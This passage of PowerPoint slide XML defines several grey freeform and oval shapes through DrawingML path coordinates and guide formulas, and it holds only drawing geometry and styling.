                  <a:gd name="T14" fmla="*/ 7 w 122"/>
                  <a:gd name="T15" fmla="*/ 73 h 117"/>
                  <a:gd name="T16" fmla="*/ 19 w 122"/>
                  <a:gd name="T17" fmla="*/ 92 h 117"/>
                  <a:gd name="T18" fmla="*/ 41 w 122"/>
                  <a:gd name="T19" fmla="*/ 109 h 117"/>
                  <a:gd name="T20" fmla="*/ 65 w 122"/>
                  <a:gd name="T21" fmla="*/ 117 h 117"/>
                  <a:gd name="T22" fmla="*/ 89 w 122"/>
                  <a:gd name="T23" fmla="*/ 117 h 117"/>
                  <a:gd name="T24" fmla="*/ 108 w 122"/>
                  <a:gd name="T25" fmla="*/ 106 h 117"/>
                  <a:gd name="T26" fmla="*/ 120 w 122"/>
                  <a:gd name="T27" fmla="*/ 89 h 117"/>
                  <a:gd name="T28" fmla="*/ 122 w 122"/>
                  <a:gd name="T29" fmla="*/ 78 h 117"/>
                  <a:gd name="T30" fmla="*/ 122 w 122"/>
                  <a:gd name="T31" fmla="*/ 67 h 117"/>
                  <a:gd name="T32" fmla="*/ 115 w 122"/>
                  <a:gd name="T33" fmla="*/ 45 h 117"/>
                  <a:gd name="T34" fmla="*/ 103 w 122"/>
                  <a:gd name="T35" fmla="*/ 25 h 117"/>
                  <a:gd name="T36" fmla="*/ 82 w 122"/>
                  <a:gd name="T37" fmla="*/ 9 h 1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17"/>
                  <a:gd name="T59" fmla="*/ 122 w 122"/>
                  <a:gd name="T60" fmla="*/ 117 h 1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17">
                    <a:moveTo>
                      <a:pt x="82" y="9"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="58" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="9"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="DDDDDD"/>
              </a:solidFill>
              <a:ln w="11113">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="zh-CN" altLang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="56410" name="Freeform 1059"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4432" y="2100"/>
                <a:ext cx="149" cy="147"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 48 w 149"/>
                  <a:gd name="T1" fmla="*/ 11 h 147"/>
                  <a:gd name="T2" fmla="*/ 24 w 149"/>
                  <a:gd name="T3" fmla="*/ 30 h 147"/>
                  <a:gd name="T4" fmla="*/ 15 w 149"/>
                  <a:gd name="T5" fmla="*/ 44 h 147"/>
                  <a:gd name="T6" fmla="*/ 7 w 149"/>
                  <a:gd name="T7" fmla="*/ 58 h 147"/>
                  <a:gd name="T8" fmla="*/ 3 w 149"/>
                  <a:gd name="T9" fmla="*/ 72 h 147"/>
                  <a:gd name="T10" fmla="*/ 0 w 149"/>
                  <a:gd name="T11" fmla="*/ 86 h 147"/>
                  <a:gd name="T12" fmla="*/ 0 w 149"/>
                  <a:gd name="T13" fmla="*/ 100 h 147"/>
                  <a:gd name="T14" fmla="*/ 5 w 149"/>
                  <a:gd name="T15" fmla="*/ 114 h 147"/>
                  <a:gd name="T16" fmla="*/ 12 w 149"/>
                  <a:gd name="T17" fmla="*/ 125 h 147"/>
                  <a:gd name="T18" fmla="*/ 22 w 149"/>
                  <a:gd name="T19" fmla="*/ 133 h 147"/>
                  <a:gd name="T20" fmla="*/ 43 w 149"/>
                  <a:gd name="T21" fmla="*/ 147 h 147"/>
                  <a:gd name="T22" fmla="*/ 58 w 149"/>
                  <a:gd name="T23" fmla="*/ 147 h 147"/>
                  <a:gd name="T24" fmla="*/ 72 w 149"/>
                  <a:gd name="T25" fmla="*/ 147 h 147"/>
                  <a:gd name="T26" fmla="*/ 87 w 149"/>
                  <a:gd name="T27" fmla="*/ 141 h 147"/>
                  <a:gd name="T28" fmla="*/ 101 w 149"/>
                  <a:gd name="T29" fmla="*/ 136 h 147"/>
                  <a:gd name="T30" fmla="*/ 125 w 149"/>
                  <a:gd name="T31" fmla="*/ 116 h 147"/>
                  <a:gd name="T32" fmla="*/ 135 w 149"/>
                  <a:gd name="T33" fmla="*/ 103 h 147"/>
                  <a:gd name="T34" fmla="*/ 142 w 149"/>
                  <a:gd name="T35" fmla="*/ 89 h 147"/>
                  <a:gd name="T36" fmla="*/ 147 w 149"/>
                  <a:gd name="T37" fmla="*/ 75 h 147"/>
                  <a:gd name="T38" fmla="*/ 149 w 149"/>
                  <a:gd name="T39" fmla="*/ 61 h 147"/>
                  <a:gd name="T40" fmla="*/ 149 w 149"/>
                  <a:gd name="T41" fmla="*/ 47 h 147"/>
                  <a:gd name="T42" fmla="*/ 144 w 149"/>
                  <a:gd name="T43" fmla="*/ 33 h 147"/>
                  <a:gd name="T44" fmla="*/ 137 w 149"/>
                  <a:gd name="T45" fmla="*/ 22 h 147"/>
                  <a:gd name="T46" fmla="*/ 130 w 149"/>
                  <a:gd name="T47" fmla="*/ 14 h 147"/>
                  <a:gd name="T48" fmla="*/ 106 w 149"/>
                  <a:gd name="T49" fmla="*/ 3 h 147"/>
                  <a:gd name="T50" fmla="*/ 91 w 149"/>
                  <a:gd name="T51" fmla="*/ 0 h 147"/>
                  <a:gd name="T52" fmla="*/ 77 w 149"/>
                  <a:gd name="T53" fmla="*/ 0 h 147"/>
                  <a:gd name="T54" fmla="*/ 63 w 149"/>
                  <a:gd name="T55" fmla="*/ 5 h 147"/>
                  <a:gd name="T56" fmla="*/ 48 w 149"/>
                  <a:gd name="T57" fmla="*/ 11 h 1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9"/>
                  <a:gd name="T88" fmla="*/ 0 h 147"/>
                  <a:gd name="T89" fmla="*/ 149 w 149"/>
                  <a:gd name="T90" fmla="*/ 147 h 14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9" h="147">
                    <a:moveTo>
                      <a:pt x="48" y="11"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="24" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="11"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="DDDDDD"/>
              </a:solidFill>
              <a:ln w="11113">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="zh-CN" altLang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="56411" name="Oval 1060"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4241" y="2119"/>
                <a:ext cx="248" cy="172"/>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12" name="Freeform 1061"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4137" y="2114"/>
                <a:ext cx="139" cy="119"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 84 w 139"/>
                  <a:gd name="T1" fmla="*/ 5 h 119"/>
                  <a:gd name="T2" fmla="*/ 58 w 139"/>
                  <a:gd name="T3" fmla="*/ 0 h 119"/>
                  <a:gd name="T4" fmla="*/ 34 w 139"/>
                  <a:gd name="T5" fmla="*/ 5 h 119"/>
                  <a:gd name="T6" fmla="*/ 14 w 139"/>
                  <a:gd name="T7" fmla="*/ 16 h 119"/>
                  <a:gd name="T8" fmla="*/ 7 w 139"/>
                  <a:gd name="T9" fmla="*/ 25 h 119"/>
                  <a:gd name="T10" fmla="*/ 2 w 139"/>
                  <a:gd name="T11" fmla="*/ 36 h 119"/>
                  <a:gd name="T12" fmla="*/ 0 w 139"/>
                  <a:gd name="T13" fmla="*/ 47 h 119"/>
                  <a:gd name="T14" fmla="*/ 2 w 139"/>
                  <a:gd name="T15" fmla="*/ 58 h 119"/>
                  <a:gd name="T16" fmla="*/ 5 w 139"/>
                  <a:gd name="T17" fmla="*/ 69 h 119"/>
                  <a:gd name="T18" fmla="*/ 12 w 139"/>
                  <a:gd name="T19" fmla="*/ 80 h 119"/>
                  <a:gd name="T20" fmla="*/ 29 w 139"/>
                  <a:gd name="T21" fmla="*/ 100 h 119"/>
                  <a:gd name="T22" fmla="*/ 55 w 139"/>
                  <a:gd name="T23" fmla="*/ 114 h 119"/>
                  <a:gd name="T24" fmla="*/ 82 w 139"/>
                  <a:gd name="T25" fmla="*/ 119 h 119"/>
                  <a:gd name="T26" fmla="*/ 108 w 139"/>
                  <a:gd name="T27" fmla="*/ 116 h 119"/>
                  <a:gd name="T28" fmla="*/ 127 w 139"/>
                  <a:gd name="T29" fmla="*/ 105 h 119"/>
                  <a:gd name="T30" fmla="*/ 132 w 139"/>
                  <a:gd name="T31" fmla="*/ 97 h 119"/>
                  <a:gd name="T32" fmla="*/ 137 w 139"/>
                  <a:gd name="T33" fmla="*/ 86 h 119"/>
                  <a:gd name="T34" fmla="*/ 139 w 139"/>
                  <a:gd name="T35" fmla="*/ 75 h 119"/>
                  <a:gd name="T36" fmla="*/ 139 w 139"/>
                  <a:gd name="T37" fmla="*/ 64 h 119"/>
                  <a:gd name="T38" fmla="*/ 134 w 139"/>
                  <a:gd name="T39" fmla="*/ 50 h 119"/>
                  <a:gd name="T40" fmla="*/ 130 w 139"/>
                  <a:gd name="T41" fmla="*/ 39 h 119"/>
                  <a:gd name="T42" fmla="*/ 110 w 139"/>
                  <a:gd name="T43" fmla="*/ 19 h 119"/>
                  <a:gd name="T44" fmla="*/ 84 w 139"/>
                  <a:gd name="T45" fmla="*/ 5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9"/>
                  <a:gd name="T70" fmla="*/ 0 h 119"/>
                  <a:gd name="T71" fmla="*/ 139 w 139"/>
                  <a:gd name="T72" fmla="*/ 119 h 1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9" h="119">
                    <a:moveTo>
                      <a:pt x="84" y="5"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="58" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="5"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="DDDDDD"/>
              </a:solidFill>
              <a:ln w="11113">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="zh-CN" altLang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="56413" name="Oval 1062"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4099" y="2031"/>
                <a:ext cx="112" cy="110"/>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14" name="Freeform 1063"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4120" y="1927"/>
                <a:ext cx="147" cy="137"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 48 w 147"/>
                  <a:gd name="T1" fmla="*/ 20 h 137"/>
                  <a:gd name="T2" fmla="*/ 24 w 147"/>
                  <a:gd name="T3" fmla="*/ 42 h 137"/>
                  <a:gd name="T4" fmla="*/ 7 w 147"/>
                  <a:gd name="T5" fmla="*/ 67 h 137"/>
                  <a:gd name="T6" fmla="*/ 3 w 147"/>
                  <a:gd name="T7" fmla="*/ 81 h 137"/>
                  <a:gd name="T8" fmla="*/ 0 w 147"/>
                  <a:gd name="T9" fmla="*/ 92 h 137"/>
                  <a:gd name="T10" fmla="*/ 3 w 147"/>
                  <a:gd name="T11" fmla="*/ 103 h 137"/>
                  <a:gd name="T12" fmla="*/ 5 w 147"/>
                  <a:gd name="T13" fmla="*/ 114 h 137"/>
                  <a:gd name="T14" fmla="*/ 12 w 147"/>
                  <a:gd name="T15" fmla="*/ 123 h 137"/>
                  <a:gd name="T16" fmla="*/ 22 w 147"/>
                  <a:gd name="T17" fmla="*/ 131 h 137"/>
                  <a:gd name="T18" fmla="*/ 43 w 147"/>
                  <a:gd name="T19" fmla="*/ 137 h 137"/>
                  <a:gd name="T20" fmla="*/ 70 w 147"/>
                  <a:gd name="T21" fmla="*/ 131 h 137"/>
                  <a:gd name="T22" fmla="*/ 99 w 147"/>
                  <a:gd name="T23" fmla="*/ 117 h 137"/>
                  <a:gd name="T24" fmla="*/ 123 w 147"/>
                  <a:gd name="T25" fmla="*/ 95 h 137"/>
                  <a:gd name="T26" fmla="*/ 132 w 147"/>
                  <a:gd name="T27" fmla="*/ 84 h 137"/>
                  <a:gd name="T28" fmla="*/ 139 w 147"/>
                  <a:gd name="T29" fmla="*/ 70 h 137"/>
                  <a:gd name="T30" fmla="*/ 144 w 147"/>
                  <a:gd name="T31" fmla="*/ 56 h 137"/>
                  <a:gd name="T32" fmla="*/ 147 w 147"/>
                  <a:gd name="T33" fmla="*/ 45 h 137"/>
                  <a:gd name="T34" fmla="*/ 147 w 147"/>
                  <a:gd name="T35" fmla="*/ 34 h 137"/>
                  <a:gd name="T36" fmla="*/ 142 w 147"/>
                  <a:gd name="T37" fmla="*/ 23 h 137"/>
                  <a:gd name="T38" fmla="*/ 135 w 147"/>
                  <a:gd name="T39" fmla="*/ 14 h 137"/>
                  <a:gd name="T40" fmla="*/ 127 w 147"/>
                  <a:gd name="T41" fmla="*/ 6 h 137"/>
                  <a:gd name="T42" fmla="*/ 103 w 147"/>
                  <a:gd name="T43" fmla="*/ 0 h 137"/>
                  <a:gd name="T44" fmla="*/ 77 w 147"/>
                  <a:gd name="T45" fmla="*/ 6 h 137"/>
                  <a:gd name="T46" fmla="*/ 48 w 147"/>
                  <a:gd name="T47" fmla="*/ 20 h 1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7"/>
                  <a:gd name="T73" fmla="*/ 0 h 137"/>
                  <a:gd name="T74" fmla="*/ 147 w 147"/>
                  <a:gd name="T75" fmla="*/ 137 h 1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7" h="137">
                    <a:moveTo>
                      <a:pt x="48" y="20"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="24" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="20"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="DDDDDD"/>
              </a:solidFill>
              <a:ln w="11113">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="zh-CN" altLang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="56415" name="Freeform 1064"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4151" y="1930"/>
                <a:ext cx="392" cy="298"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 58 w 392"/>
                  <a:gd name="T1" fmla="*/ 61 h 298"/>
                  <a:gd name="T2" fmla="*/ 77 w 392"/>
                  <a:gd name="T3" fmla="*/ 59 h 298"/>
                  <a:gd name="T4" fmla="*/ 96 w 392"/>
                  <a:gd name="T5" fmla="*/ 53 h 298"/>
                  <a:gd name="T6" fmla="*/ 113 w 392"/>
                  <a:gd name="T7" fmla="*/ 50 h 298"/>
                  <a:gd name="T8" fmla="*/ 125 w 392"/>
                  <a:gd name="T9" fmla="*/ 36 h 298"/>
                  <a:gd name="T10" fmla="*/ 108 w 392"/>
                  <a:gd name="T11" fmla="*/ 31 h 298"/>
                  <a:gd name="T12" fmla="*/ 92 w 392"/>
                  <a:gd name="T13" fmla="*/ 36 h 298"/>
                  <a:gd name="T14" fmla="*/ 82 w 392"/>
                  <a:gd name="T15" fmla="*/ 36 h 298"/>
                  <a:gd name="T16" fmla="*/ 99 w 392"/>
                  <a:gd name="T17" fmla="*/ 20 h 298"/>
                  <a:gd name="T18" fmla="*/ 120 w 392"/>
                  <a:gd name="T19" fmla="*/ 11 h 298"/>
                  <a:gd name="T20" fmla="*/ 137 w 392"/>
                  <a:gd name="T21" fmla="*/ 9 h 298"/>
                  <a:gd name="T22" fmla="*/ 154 w 392"/>
                  <a:gd name="T23" fmla="*/ 6 h 298"/>
                  <a:gd name="T24" fmla="*/ 171 w 392"/>
                  <a:gd name="T25" fmla="*/ 0 h 298"/>
                  <a:gd name="T26" fmla="*/ 188 w 392"/>
                  <a:gd name="T27" fmla="*/ 0 h 298"/>
                  <a:gd name="T28" fmla="*/ 207 w 392"/>
                  <a:gd name="T29" fmla="*/ 0 h 298"/>
                  <a:gd name="T30" fmla="*/ 245 w 392"/>
                  <a:gd name="T31" fmla="*/ 0 h 298"/>
                  <a:gd name="T32" fmla="*/ 269 w 392"/>
                  <a:gd name="T33" fmla="*/ 0 h 298"/>
                  <a:gd name="T34" fmla="*/ 288 w 392"/>
                  <a:gd name="T35" fmla="*/ 11 h 298"/>
                  <a:gd name="T36" fmla="*/ 303 w 392"/>
                  <a:gd name="T37" fmla="*/ 28 h 298"/>
                  <a:gd name="T38" fmla="*/ 322 w 392"/>
                  <a:gd name="T39" fmla="*/ 39 h 298"/>
                  <a:gd name="T40" fmla="*/ 339 w 392"/>
                  <a:gd name="T41" fmla="*/ 42 h 298"/>
                  <a:gd name="T42" fmla="*/ 356 w 392"/>
                  <a:gd name="T43" fmla="*/ 59 h 298"/>
                  <a:gd name="T44" fmla="*/ 370 w 392"/>
                  <a:gd name="T45" fmla="*/ 73 h 298"/>
                  <a:gd name="T46" fmla="*/ 380 w 392"/>
                  <a:gd name="T47" fmla="*/ 95 h 298"/>
                  <a:gd name="T48" fmla="*/ 384 w 392"/>
                  <a:gd name="T49" fmla="*/ 120 h 298"/>
                  <a:gd name="T50" fmla="*/ 387 w 392"/>
                  <a:gd name="T51" fmla="*/ 145 h 298"/>
                  <a:gd name="T52" fmla="*/ 387 w 392"/>
                  <a:gd name="T53" fmla="*/ 167 h 298"/>
                  <a:gd name="T54" fmla="*/ 387 w 392"/>
                  <a:gd name="T55" fmla="*/ 189 h 298"/>
                  <a:gd name="T56" fmla="*/ 392 w 392"/>
                  <a:gd name="T57" fmla="*/ 211 h 298"/>
                  <a:gd name="T58" fmla="*/ 392 w 392"/>
                  <a:gd name="T59" fmla="*/ 234 h 298"/>
                  <a:gd name="T60" fmla="*/ 380 w 392"/>
                  <a:gd name="T61" fmla="*/ 256 h 298"/>
                  <a:gd name="T62" fmla="*/ 360 w 392"/>
                  <a:gd name="T63" fmla="*/ 267 h 298"/>
                  <a:gd name="T64" fmla="*/ 344 w 392"/>
                  <a:gd name="T65" fmla="*/ 278 h 298"/>
                  <a:gd name="T66" fmla="*/ 327 w 392"/>
                  <a:gd name="T67" fmla="*/ 289 h 298"/>
                  <a:gd name="T68" fmla="*/ 310 w 392"/>
                  <a:gd name="T69" fmla="*/ 295 h 298"/>
                  <a:gd name="T70" fmla="*/ 286 w 392"/>
                  <a:gd name="T71" fmla="*/ 298 h 298"/>
                  <a:gd name="T72" fmla="*/ 267 w 392"/>
                  <a:gd name="T73" fmla="*/ 298 h 298"/>
                  <a:gd name="T74" fmla="*/ 250 w 392"/>
                  <a:gd name="T75" fmla="*/ 298 h 298"/>
                  <a:gd name="T76" fmla="*/ 231 w 392"/>
                  <a:gd name="T77" fmla="*/ 298 h 298"/>
                  <a:gd name="T78" fmla="*/ 214 w 392"/>
                  <a:gd name="T79" fmla="*/ 298 h 298"/>
                  <a:gd name="T80" fmla="*/ 197 w 392"/>
                  <a:gd name="T81" fmla="*/ 298 h 298"/>
                  <a:gd name="T82" fmla="*/ 180 w 392"/>
                  <a:gd name="T83" fmla="*/ 298 h 298"/>
                  <a:gd name="T84" fmla="*/ 164 w 392"/>
                  <a:gd name="T85" fmla="*/ 298 h 298"/>
                  <a:gd name="T86" fmla="*/ 142 w 392"/>
                  <a:gd name="T87" fmla="*/ 298 h 298"/>
                  <a:gd name="T88" fmla="*/ 125 w 392"/>
                  <a:gd name="T89" fmla="*/ 298 h 298"/>
                  <a:gd name="T90" fmla="*/ 108 w 392"/>
                  <a:gd name="T91" fmla="*/ 298 h 298"/>
                  <a:gd name="T92" fmla="*/ 92 w 392"/>
                  <a:gd name="T93" fmla="*/ 286 h 298"/>
                  <a:gd name="T94" fmla="*/ 75 w 392"/>
                  <a:gd name="T95" fmla="*/ 278 h 298"/>
                  <a:gd name="T96" fmla="*/ 58 w 392"/>
                  <a:gd name="T97" fmla="*/ 267 h 298"/>
                  <a:gd name="T98" fmla="*/ 44 w 392"/>
                  <a:gd name="T99" fmla="*/ 248 h 298"/>
                  <a:gd name="T100" fmla="*/ 32 w 392"/>
                  <a:gd name="T101" fmla="*/ 234 h 298"/>
                  <a:gd name="T102" fmla="*/ 20 w 392"/>
                  <a:gd name="T103" fmla="*/ 211 h 298"/>
                  <a:gd name="T104" fmla="*/ 8 w 392"/>
                  <a:gd name="T105" fmla="*/ 186 h 298"/>
                  <a:gd name="T106" fmla="*/ 0 w 392"/>
                  <a:gd name="T107" fmla="*/ 159 h 298"/>
                  <a:gd name="T108" fmla="*/ 0 w 392"/>
                  <a:gd name="T109" fmla="*/ 136 h 298"/>
                  <a:gd name="T110" fmla="*/ 3 w 392"/>
                  <a:gd name="T111" fmla="*/ 111 h 298"/>
                  <a:gd name="T112" fmla="*/ 15 w 392"/>
                  <a:gd name="T113" fmla="*/ 92 h 298"/>
                  <a:gd name="T114" fmla="*/ 29 w 392"/>
                  <a:gd name="T115" fmla="*/ 81 h 298"/>
                  <a:gd name="T116" fmla="*/ 46 w 392"/>
                  <a:gd name="T117" fmla="*/ 73 h 298"/>
                  <a:gd name="T118" fmla="*/ 60 w 392"/>
                  <a:gd name="T119" fmla="*/ 61 h 298"/>
                  <a:gd name="T120" fmla="*/ 68 w 392"/>
                  <a:gd name="T121" fmla="*/ 73 h 2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2"/>
                  <a:gd name="T184" fmla="*/ 0 h 298"/>
                  <a:gd name="T185" fmla="*/ 392 w 392"/>
                  <a:gd name="T186" fmla="*/ 298 h 2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2" h="298">
                    <a:moveTo>
                      <a:pt x="48" y="61"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="58" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
